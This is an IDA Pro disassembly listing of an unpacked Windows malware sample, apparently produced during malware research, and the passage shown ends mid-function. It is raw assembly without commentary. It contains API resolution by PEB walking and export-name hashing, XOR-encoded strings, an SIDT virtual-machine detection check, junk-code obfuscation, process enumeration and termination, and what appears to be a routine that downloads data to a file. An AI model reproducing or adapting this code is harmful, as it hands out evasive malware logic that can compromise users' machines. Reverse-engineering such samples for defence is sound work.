;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 1C5756C7A980D31E33074C5A66B0A11D
; File Name : u:\work\1c5756c7a980d31e33074c5a66b0a11d_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40102E+28�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
lea ecx, [esi-1]
test ecx, ecx
push 2
pop eax
jz short loc_401015
loc_40100F: ; CODE XREF: sub_401000+13�j
imul eax, eax
dec ecx
jnz short loc_40100F
loc_401015: ; CODE XREF: sub_401000+D�j
movzx edx, [esp+4+arg_0]
push 8
pop ecx
sub ecx, esi
dec eax
shl eax, cl
and eax, edx
sar eax, cl
mov ecx, esi
shl edx, cl
pop esi
or eax, edx
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40102E proc near ; CODE XREF: sub_401117:loc_401170�p
; sub_4014C3+24B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_4]
push 100h
xor esi, esi
push esi
push edi
call sub_4010BB
add esp, 0Ch
cmp [esp+8+arg_8], esi
jle short loc_40106B
push ebx
mov ebx, [esp+0Ch+arg_0]
loc_401050: ; CODE XREF: sub_40102E+3A�j
movzx eax, byte ptr [ebx]
push 7
push eax
call sub_401000
xor al, 6
inc ebx
mov [esi+edi], al
inc esi
cmp esi, [esp+14h+arg_8]
pop ecx
pop ecx
jl short loc_401050
pop ebx
loc_40106B: ; CODE XREF: sub_40102E+1B�j
mov byte ptr [esi+edi], 0
pop edi
pop esi
retn
sub_40102E endp
; =============== S U B R O U T I N E =======================================
sub_401072 proc near ; CODE XREF: sub_401117:loc_4011D4�p
push esi
mov eax, fs:[eax+30h]
test eax, eax
js short loc_401087
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov eax, [eax+8]
jmp short loc_401090
; ---------------------------------------------------------------------------
loc_401087: ; CODE XREF: sub_401072+7�j
mov eax, [eax+34h]
lea eax, [eax+7Ch]
mov eax, [eax+3Ch]
loc_401090: ; CODE XREF: sub_401072+13�j
pop esi
retn
sub_401072 endp
; ---------------------------------------------------------------------------
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401094 proc near ; CODE XREF: sub_401CC3+1FC�p
var_7 = byte ptr -7
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_1], 0
sidt fword ptr [ebp+var_7]
mov eax, dword ptr [ebp+var_7+2]
and eax, 0FFF00000h
cmp eax, 0FFC00000h
jnz short loc_4010B5
mov [ebp+var_1], 1
loc_4010B5: ; CODE XREF: sub_401094+1B�j
movzx eax, [ebp+var_1]
leave
retn
sub_401094 endp
; =============== S U B R O U T I N E =======================================
sub_4010BB proc near ; CODE XREF: sub_40102E+F�p
; sub_4014C3+110�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
test ecx, ecx
jz short loc_4010E9
mov al, [esp+arg_4]
push ebx
mov bl, al
mov bh, bl
mov edx, ecx
push edi
mov edi, [esp+8+arg_0]
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
pop ebx
loc_4010E9: ; CODE XREF: sub_4010BB+6�j
mov eax, [esp+arg_0]
retn
sub_4010BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010EE proc near ; CODE XREF: sub_402498+187�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
mov eax, [ebp+arg_4]
jz short loc_40110E
mov ecx, [ebp+arg_0]
sub ecx, eax
loc_4010FF: ; CODE XREF: sub_4010EE+1E�j
mov dl, [eax]
dec [ebp+arg_8]
mov [ecx+eax], dl
inc eax
cmp [ebp+arg_8], 0
jnz short loc_4010FF
loc_40110E: ; CODE XREF: sub_4010EE+A�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_4010EE endp
; =============== S U B R O U T I N E =======================================
sub_401113 proc near ; CODE XREF: sub_402498+C�p
mov eax, [esp+0]
retn
sub_401113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401117 proc near ; CODE XREF: sub_401117+65�p
; sub_40131A+46�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 25h
pop eax
push 14h
pop ecx
loc_401123: ; CODE XREF: sub_401117+21�j
cmp ecx, 0B7h
ja short loc_40112D
inc eax
inc ecx
loc_40112D: ; CODE XREF: sub_401117+12�j
add eax, 20h
add ecx, 20h
cmp eax, 0B3h
jl short loc_401123
mov dword_404104, eax
mov eax, [ebp+arg_0]
dec eax
push esi
jz loc_4011D4
dec eax
jz short loc_4011C5
dec eax
jz short loc_4011B6
dec eax
jz short loc_4011A7
dec eax
jz short loc_401198
dec eax
jz short loc_401189
dec eax
jz short loc_401163
loc_40115C: ; CODE XREF: sub_401117+1C2�j
xor eax, eax
jmp loc_401312
; ---------------------------------------------------------------------------
loc_401163: ; CODE XREF: sub_401117+43�j
push 0Bh
mov esi, offset dword_404208
push esi
push offset dword_40305C
loc_401170: ; CODE XREF: sub_401117+7F�j
; sub_401117+8E�j ...
call sub_40102E
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push esi
call eax
jmp short loc_4011D9
; ---------------------------------------------------------------------------
loc_401189: ; CODE XREF: sub_401117+40�j
push 0Ch
mov esi, offset dword_404208
push esi
push offset dword_40304C
jmp short loc_401170
; ---------------------------------------------------------------------------
loc_401198: ; CODE XREF: sub_401117+3D�j
push 9
mov esi, offset dword_404208
push esi
push offset dword_403040
jmp short loc_401170
; ---------------------------------------------------------------------------
loc_4011A7: ; CODE XREF: sub_401117+3A�j
push 0Bh
mov esi, offset dword_404208
push esi
push offset dword_403034
jmp short loc_401170
; ---------------------------------------------------------------------------
loc_4011B6: ; CODE XREF: sub_401117+37�j
push 0Ah
mov esi, offset dword_404208
push esi
push offset dword_403028
jmp short loc_401170
; ---------------------------------------------------------------------------
loc_4011C5: ; CODE XREF: sub_401117+34�j
push 0Bh
mov esi, offset dword_404208
push esi
push offset dword_40301C
jmp short loc_401170
; ---------------------------------------------------------------------------
loc_4011D4: ; CODE XREF: sub_401117+2D�j
call sub_401072
loc_4011D9: ; CODE XREF: sub_401117+70�j
mov edx, dword_404104
cmp edx, 0Eh
mov [ebp+arg_0], eax
jl short loc_4011EE
inc edx
mov dword_404104, edx
loc_4011EE: ; CODE XREF: sub_401117+CE�j
cmp edx, 96h
jle short loc_4011FF
push 20h
pop edx
mov dword_404104, edx
loc_4011FF: ; CODE XREF: sub_401117+DD�j
mov ecx, [ebp+arg_0]
mov eax, [ecx+3Ch]
mov esi, [eax+ecx+78h]
lea eax, [edx-3Fh]
add esi, ecx
cmp eax, 89h
ja short loc_40121C
inc edx
mov dword_404104, edx
loc_40121C: ; CODE XREF: sub_401117+FC�j
mov eax, [ebp+arg_4]
shr eax, 10h
test ax, ax
jnz short loc_401233
movzx eax, word ptr [ebp+arg_4]
sub eax, [esi+10h]
jmp loc_4012E2
; ---------------------------------------------------------------------------
loc_401233: ; CODE XREF: sub_401117+10E�j
lea eax, [edx-3Fh]
cmp eax, 0B1h
ja short loc_401244
inc edx
mov dword_404104, edx
loc_401244: ; CODE XREF: sub_401117+124�j
push ebx
mov ebx, [esi+24h]
push edi
mov edi, [esi+20h]
add ebx, ecx
lea eax, [edx-0Ah]
add edi, ecx
cmp eax, 0D1h
mov [ebp+var_C], ebx
ja short loc_401264
inc edx
mov dword_404104, edx
loc_401264: ; CODE XREF: sub_401117+144�j
and [ebp+var_4], 0
cmp dword ptr [esi+18h], 0
jbe short loc_4012B0
loc_40126E: ; CODE XREF: sub_401117+197�j
mov ecx, [edi]
add ecx, [ebp+arg_0]
and [ebp+var_8], 0
mov al, [ecx]
test al, al
jz short loc_401295
loc_40127D: ; CODE XREF: sub_401117+179�j
mov ebx, [ebp+var_8]
movsx eax, al
rol ebx, 7
xor ebx, eax
inc ecx
mov al, [ecx]
test al, al
mov [ebp+var_8], ebx
jnz short loc_40127D
mov ebx, [ebp+var_C]
loc_401295: ; CODE XREF: sub_401117+164�j
mov eax, [ebp+arg_4]
cmp [ebp+var_8], eax
jz short loc_401315
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 4
inc ebx
inc ebx
cmp eax, [esi+18h]
mov [ebp+var_C], ebx
jb short loc_40126E
loc_4012B0: ; CODE XREF: sub_401117+155�j
mov eax, [ebp+arg_0]
loc_4012B3: ; CODE XREF: sub_401117+201�j
cmp edx, 12h
pop edi
pop ebx
jl short loc_4012C1
inc edx
mov dword_404104, edx
loc_4012C1: ; CODE XREF: sub_401117+1A1�j
cmp edx, 0CAh
jle short loc_4012D3
mov dword_404104, 25h
loc_4012D3: ; CODE XREF: sub_401117+1B0�j
mov ecx, [ebp+var_4]
cmp ecx, [esi+18h]
jz loc_40115C
mov ecx, [ebp+arg_0]
loc_4012E2: ; CODE XREF: sub_401117+117�j
mov edx, [esi+1Ch]
lea eax, [edx+eax*4]
mov ecx, [eax+ecx]
push 29h
pop eax
push 1Eh
pop edx
loc_4012F1: ; CODE XREF: sub_401117+1EF�j
cmp edx, 0DCh
ja short loc_4012FB
inc eax
inc edx
loc_4012FB: ; CODE XREF: sub_401117+1E0�j
add eax, 2Dh
add edx, 2Dh
cmp eax, 0BFh
jl short loc_4012F1
mov dword_404104, eax
mov eax, [ebp+arg_0]
add eax, ecx
loc_401312: ; CODE XREF: sub_401117+47�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_401315: ; CODE XREF: sub_401117+184�j
movzx eax, word ptr [ebx]
jmp short loc_4012B3
sub_401117 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40131A proc near ; CODE XREF: sub_401CC3+209�p
; sub_4029F5+15�p
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
mov eax, dword_404104
add eax, 0FFFFFFEFh
sub esp, 94h
cmp eax, 0C7h
ja short loc_401338
inc dword_404104
loc_401338: ; CODE XREF: sub_40131A+16�j
cmp byte_404409, 0
jz short loc_401348
mov al, byte_404408
leave
retn
; ---------------------------------------------------------------------------
loc_401348: ; CODE XREF: sub_40131A+25�j
push 9C480E24h
push 1
mov byte_404409, 1
mov [ebp+var_94], 94h
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_94]
push ecx
call eax
cmp [ebp+var_84], 2
setz al
cmp dword_404104, 18h
mov byte_404408, al
jge short locret_40138E
inc dword_404104
locret_40138E: ; CODE XREF: sub_40131A+6C�j
leave
retn
sub_40131A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401390 proc near ; CODE XREF: sub_4014C3+2A1�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 5Eh
pop eax
push 2Fh
pop ecx
loc_40139A: ; CODE XREF: sub_401390+1F�j
cmp ecx, 0ADh
ja short loc_4013A4
inc eax
inc ecx
loc_4013A4: ; CODE XREF: sub_401390+10�j
add eax, 2Eh
add ecx, 2Eh
cmp eax, 0ABh
jl short loc_40139A
push ebx
push esi
push edi
xor edi, edi
inc edi
cmp [ebp+arg_0], 0
mov dword_404104, eax
jz loc_401489
mov esi, 99A4299Dh
push esi
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push edi
push edi
call eax
mov ebx, eax
test ebx, ebx
jz short loc_40142D
push 10h
pop eax
push 0FFFFFFD0h
pop ecx
loc_4013E7: ; CODE XREF: sub_401390+6C�j
cmp ecx, 0ADh
ja short loc_4013F1
inc eax
inc ecx
loc_4013F1: ; CODE XREF: sub_401390+5D�j
add eax, 16h
add ecx, 16h
cmp eax, 8Ah
jl short loc_4013E7
push 0FDC94385h
push edi
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push ebx
call eax
mov esi, [ebp+var_4]
push 9E6FA842h
push edi
call sub_401117
pop ecx
pop ecx
push esi
push ebx
call eax
jmp short loc_40148C
; ---------------------------------------------------------------------------
loc_40142D: ; CODE XREF: sub_401390+4F�j
cmp dword_404104, 6
jl short loc_40143C
inc dword_404104
loc_40143C: ; CODE XREF: sub_401390+A4�j
cmp dword_404104, 0E8h
jle short loc_401452
mov dword_404104, 26h
loc_401452: ; CODE XREF: sub_401390+B6�j
push esi
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+arg_0]
push 0
push edi
call eax
push 9E6FA842h
push edi
mov ebx, eax
call sub_401117
pop ecx
pop ecx
push 0FFFFFFFFh
push ebx
call eax
push 723EB0D5h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
call eax
jmp short loc_40148C
; ---------------------------------------------------------------------------
loc_401489: ; CODE XREF: sub_401390+30�j
mov ebx, [ebp+arg_0]
loc_40148C: ; CODE XREF: sub_401390+9B�j
; sub_401390+F7�j
push 34h
pop eax
push 19h
pop ecx
loc_401492: ; CODE XREF: sub_401390+117�j
cmp ecx, 0B0h
ja short loc_40149C
inc eax
inc ecx
loc_40149C: ; CODE XREF: sub_401390+108�j
add eax, 0Ah
add ecx, 0Ah
cmp eax, 0B3h
jl short loc_401492
push 723EB0D5h
push edi
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_401390 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014C3 proc near ; CODE XREF: sub_401CC3+213�p
; sub_4029F5+F4�p ...
var_1318 = dword ptr -1318h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_116 = byte ptr -116h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1318h
call sub_402DA0
push 58h
pop eax
push 32h
pop ecx
loc_4014D6: ; CODE XREF: sub_4014C3+28�j
cmp ecx, 0BFh
ja short loc_4014E0
inc eax
inc ecx
loc_4014E0: ; CODE XREF: sub_4014C3+19�j
add eax, 10h
add ecx, 10h
cmp eax, 90h
jl short loc_4014D6
push ebx
push esi
push edi
push 774393E8h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push 100h
lea ecx, [ebp+var_318]
push ecx
push 0
call eax
push 8AC4909Bh
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_C]
push ecx
push 1000h
lea ecx, [ebp+var_1318]
push ecx
call eax
test eax, eax
jz loc_4017DF
push 2Fh
pop ecx
push 0FFFFFFD6h
pop eax
loc_401541: ; CODE XREF: sub_4014C3+93�j
cmp eax, 86h
ja short loc_40154A
inc ecx
inc eax
loc_40154A: ; CODE XREF: sub_4014C3+83�j
add ecx, 21h
add eax, 21h
cmp ecx, 0C5h
jl short loc_401541
and [ebp+var_4], 0
test [ebp+var_C], 0FFFFFFFCh
mov dword_404104, ecx
jbe loc_4017DF
mov edi, offset dword_404208
loc_401574: ; CODE XREF: sub_4014C3+316�j
mov ebx, [ebp+var_4]
lea ebx, [ebp+ebx*4+var_1318]
mov esi, [ebx]
test esi, esi
jz loc_4017CD
push 46h
pop eax
push 0FFFFFFF0h
pop ecx
loc_40158E: ; CODE XREF: sub_4014C3+E0�j
cmp ecx, 9Ah
ja short loc_401598
inc eax
inc ecx
loc_401598: ; CODE XREF: sub_4014C3+D1�j
add eax, 2Ah
add ecx, 2Ah
cmp eax, 0C2h
jl short loc_40158E
push 99A4299Dh
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push esi
xor esi, esi
push esi
push 410h
call eax
push 100h
mov [ebp+var_8], eax
lea eax, [ebp+var_118]
push esi
push eax
call sub_4010BB
add esp, 0Ch
cmp [ebp+var_8], esi
jz loc_4017BA
push 189F16C9h
push 5
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_14]
push ecx
push 4
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_8]
call eax
test eax, eax
jz loc_4017BA
cmp dword_404104, 0CAh
jge short loc_40161B
inc dword_404104
loc_40161B: ; CODE XREF: sub_4014C3+150�j
mov esi, [ebp+var_10]
push 0E4FB2191h
push 5
call sub_401117
pop ecx
pop ecx
push 100h
lea ecx, [ebp+var_118]
push ecx
push esi
push [ebp+var_8]
call eax
mov esi, dword_403008
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
test eax, eax
jz loc_4017BA
cmp [ebp+var_117], 3Ah
jnz loc_4017BA
cmp [ebp+var_116], 5Ch
jnz loc_4017BA
lea eax, [ebp+var_118]
push eax
call esi ; lstrlen
mov esi, eax
jmp short loc_40167D
; ---------------------------------------------------------------------------
loc_40167C: ; CODE XREF: sub_4014C3+1C2�j
dec esi
loc_40167D: ; CODE XREF: sub_4014C3+1B7�j
cmp [ebp+esi+var_118], 5Ch
jnz short loc_40167C
push [ebp+arg_0]
call dword_403008 ; lstrlen
test eax, eax
jle short loc_4016E1
cmp dword_404104, 1
jl short loc_4016A3
inc dword_404104
loc_4016A3: ; CODE XREF: sub_4014C3+1D8�j
cmp dword_404104, 0CFh
jle short loc_4016B9
mov dword_404104, 24h
loc_4016B9: ; CODE XREF: sub_4014C3+1EA�j
push [ebp+arg_0]
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jnz loc_4017BA
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_1318]
jmp loc_4017F1
; ---------------------------------------------------------------------------
loc_4016E1: ; CODE XREF: sub_4014C3+1CF�j
cmp dword_404104, 0Ch
jl short loc_4016F0
inc dword_404104
loc_4016F0: ; CODE XREF: sub_4014C3+225�j
cmp dword_404104, 0D2h
jle short loc_401706
mov dword_404104, 26h
loc_401706: ; CODE XREF: sub_4014C3+237�j
push 0Bh
push edi
push offset dword_40306C
call sub_40102E
push 8A94F707h
push 7
call sub_401117
add esp, 14h
lea ecx, [ebp+var_18]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
test eax, eax
jnz loc_4017BA
lea eax, [ebp+var_318]
push eax
lea eax, [ebp+var_118]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_4017BA
push edi
lea eax, [ebp+esi+var_117]
push eax
call dword_403004 ; lstrcmpi
test eax, eax
jz short loc_4017BA
push dword ptr [ebx]
call sub_401390
pop ecx
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_218]
push eax
call dword_403000 ; lstrcpy
push 1
push edi
push offset dword_403068
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_218]
push eax
call dword_40300C ; lstrcat
push 20E4E9EDh
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_218]
push ecx
lea ecx, [ebp+var_118]
push ecx
call eax
loc_4017BA: ; CODE XREF: sub_4014C3+11B�j
; sub_4014C3+140�j ...
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_8]
call eax
loc_4017CD: ; CODE XREF: sub_4014C3+BF�j
mov eax, [ebp+var_C]
inc [ebp+var_4]
shr eax, 2
cmp [ebp+var_4], eax
jb loc_401574
loc_4017DF: ; CODE XREF: sub_4014C3+72�j
; sub_4014C3+A6�j
cmp dword_404104, 92h
jge short loc_4017F1
inc dword_404104
loc_4017F1: ; CODE XREF: sub_4014C3+219�j
; sub_4014C3+326�j
pop edi
pop esi
pop ebx
leave
retn
sub_4014C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017F6 proc near ; CODE XREF: sub_401CC3+272�p
; sub_401CC3+303�p ...
var_87C = byte ptr -87Ch
var_47C = byte ptr -47Ch
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 87Ch
push ebx
xor ebx, ebx
cmp dword_404104, 23h
mov [ebp+var_4], ebx
mov [ebp+var_18], ebx
mov [ebp+var_20], 7D0h
jge short loc_40181E
inc dword_404104
loc_40181E: ; CODE XREF: sub_4017F6+20�j
push esi
push edi
mov esi, 400h
push esi
lea eax, [ebp+var_87C]
push ebx
push eax
call sub_4010BB
push 534D481h
push 3
mov [ebp+var_1C], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_87C]
push ecx
push ebx
call eax
push 5
mov edi, offset dword_404208
push edi
push offset dword_403078
call sub_40102E
add esp, 0Ch
push edi
lea eax, [ebp+var_87C]
push eax
call dword_40300C ; lstrcat
cmp dword_404104, 3Eh
mov [ebp+var_8], ebx
jge short loc_401888
inc dword_404104
loc_401888: ; CODE XREF: sub_4017F6+8A�j
push 4
pop edi
loc_40188B: ; CODE XREF: sub_4017F6+44A�j
push esi
lea eax, [ebp+var_47C]
push ebx
push eax
call sub_4010BB
add esp, 0Ch
cmp [ebp+arg_C], bl
mov [ebp+var_1C], esi
lea eax, [ebp+var_47C]
jz short loc_4018D4
cmp [ebp+var_8], ebx
jnz short loc_4018B6
push offset dword_404108
jmp short loc_4018BB
; ---------------------------------------------------------------------------
loc_4018B6: ; CODE XREF: sub_4017F6+B7�j
push offset dword_404308
loc_4018BB: ; CODE XREF: sub_4017F6+BE�j
push eax
call dword_403000 ; lstrcpy
push [ebp+arg_0]
lea eax, [ebp+var_47C]
push eax
call dword_40300C ; lstrcat
jmp short loc_4018F7
; ---------------------------------------------------------------------------
loc_4018D4: ; CODE XREF: sub_4017F6+B2�j
push offset dword_404308
push eax
call dword_403000 ; lstrcpy
push [ebp+arg_0]
lea eax, [ebp+var_47C]
push eax
call dword_40300C ; lstrcat
mov [ebp+var_8], 1
loc_4018F7: ; CODE XREF: sub_4017F6+DC�j
push 8593DD7h
push edi
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_87C]
push ecx
call eax
push 0B87DBD66h
push edi
mov [ebp+var_10], eax
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_10]
call eax
push 3Fh
mov [ebp+var_C], eax
pop eax
push 2
pop ecx
loc_40193A: ; CODE XREF: sub_4017F6+157�j
cmp ecx, 99h
ja short loc_401944
inc eax
inc ecx
loc_401944: ; CODE XREF: sub_4017F6+14A�j
add eax, 2Ah
add ecx, 2Ah
cmp eax, 7Eh
jl short loc_40193A
push 1AD09C78h
push edi
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 2
push [ebp+var_10]
call eax
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 6
push [ebp+var_10]
call eax
push 1AD09C78h
push edi
call sub_401117
pop ecx
pop ecx
push edi
lea ecx, [ebp+var_20]
push ecx
push 5
push [ebp+var_10]
call eax
mov eax, dword_404104
add eax, 0FFFFFFEFh
cmp eax, 0BCh
ja short loc_4019B4
inc dword_404104
loc_4019B4: ; CODE XREF: sub_4017F6+1B6�j
push 2F5CE027h
push edi
mov [ebp+var_18], ebx
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_18]
push ecx
push 20000005h
push [ebp+var_C]
call eax
mov eax, [ebp+var_18]
lea ecx, [eax-401h]
cmp ecx, 48FDEh
ja loc_401B37
push 30h
pop eax
push 2Bh
pop ecx
loc_4019F5: ; CODE XREF: sub_4017F6+214�j
cmp ecx, 0EAh
ja short loc_4019FF
inc eax
inc ecx
loc_4019FF: ; CODE XREF: sub_4017F6+205�j
add eax, 2Ch
add ecx, 2Ch
cmp eax, 0AFh
jl short loc_4019F5
push 8F8F114h
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push edi
push ebx
push 2
push 40000000h
push [ebp+arg_4]
call eax
push esi
mov [ebp+var_14], eax
lea eax, [ebp+var_47C]
push ebx
push eax
mov [ebp+var_4], ebx
call sub_4010BB
push 1A212962h
push edi
mov [ebp+var_1C], esi
call sub_401117
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_C]
call eax
test eax, eax
setnz al
cmp dword_404104, 7
jl short loc_401A7D
inc dword_404104
loc_401A7D: ; CODE XREF: sub_4017F6+27F�j
cmp dword_404104, 0CAh
jle short loc_401AF9
mov dword_404104, 14h
jmp short loc_401AF9
; ---------------------------------------------------------------------------
loc_401A95: ; CODE XREF: sub_4017F6+306�j
cmp al, bl
jz short loc_401AFE
mov eax, [ebp+var_4]
push 0F3FD1C3h
push 1
mov [ebp+var_24], eax
call sub_401117
pop ecx
pop ecx
push ebx
lea ecx, [ebp+var_28]
push ecx
push [ebp+var_24]
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_14]
call eax
push esi
lea eax, [ebp+var_47C]
push ebx
push eax
call sub_4010BB
push 1A212962h
push edi
mov [ebp+var_1C], esi
mov [ebp+var_4], ebx
call sub_401117
add esp, 14h
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_C]
call eax
test eax, eax
setnz al
loc_401AF9: ; CODE XREF: sub_4017F6+291�j
; sub_4017F6+29D�j
cmp [ebp+var_4], ebx
ja short loc_401A95
loc_401AFE: ; CODE XREF: sub_4017F6+2A1�j
cmp dword_404104, edi
jl short loc_401B0C
inc dword_404104
loc_401B0C: ; CODE XREF: sub_4017F6+30E�j
cmp dword_404104, 0D3h
jle short loc_401B22
mov dword_404104, 1Fh
loc_401B22: ; CODE XREF: sub_4017F6+320�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_14]
call eax
jmp short loc_401B4A
; ---------------------------------------------------------------------------
loc_401B37: ; CODE XREF: sub_4017F6+1F3�j
add eax, 0FFFFFFFEh
cmp eax, 3FEh
ja short loc_401B4A
mov [ebp+arg_8], bl
jmp short loc_401B4A
; ---------------------------------------------------------------------------
loc_401B46: ; CODE XREF: sub_4017F6+37A�j
cmp al, bl
jz short loc_401B72
loc_401B4A: ; CODE XREF: sub_4017F6+33F�j
; sub_4017F6+349�j ...
push 1A212962h
push edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push esi
lea ecx, [ebp+var_47C]
push ecx
push [ebp+var_C]
call eax
test eax, eax
setnz al
cmp [ebp+var_4], ebx
ja short loc_401B46
loc_401B72: ; CODE XREF: sub_4017F6+352�j
cmp dword_404104, 97h
jge short loc_401B84
inc dword_404104
loc_401B84: ; CODE XREF: sub_4017F6+386�j
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_C]
call eax
push 7314FB0Ch
push edi
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
cmp dword_404104, 12h
jl short loc_401BB7
inc dword_404104
loc_401BB7: ; CODE XREF: sub_4017F6+3B9�j
cmp dword_404104, 0E8h
jle short loc_401BCD
mov dword_404104, 23h
loc_401BCD: ; CODE XREF: sub_4017F6+3CB�j
push 8F8F114h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call eax
push 0AEF7CBF1h
push 1
mov [ebp+var_14], eax
call sub_401117
pop ecx
pop ecx
push ebx
push [ebp+var_14]
call eax
push 723EB0D5h
push 1
mov [ebp+var_24], eax
call sub_401117
pop ecx
pop ecx
push [ebp+var_14]
call eax
inc [ebp+var_8]
cmp dword_404104, 2Ch
jge short loc_401C2F
inc dword_404104
loc_401C2F: ; CODE XREF: sub_4017F6+431�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_24]
jz short loc_401C46
cmp [ebp+var_8], 2
jge short loc_401C46
cmp [ebp+arg_8], bl
jnz loc_40188B
loc_401C46: ; CODE XREF: sub_4017F6+43F�j
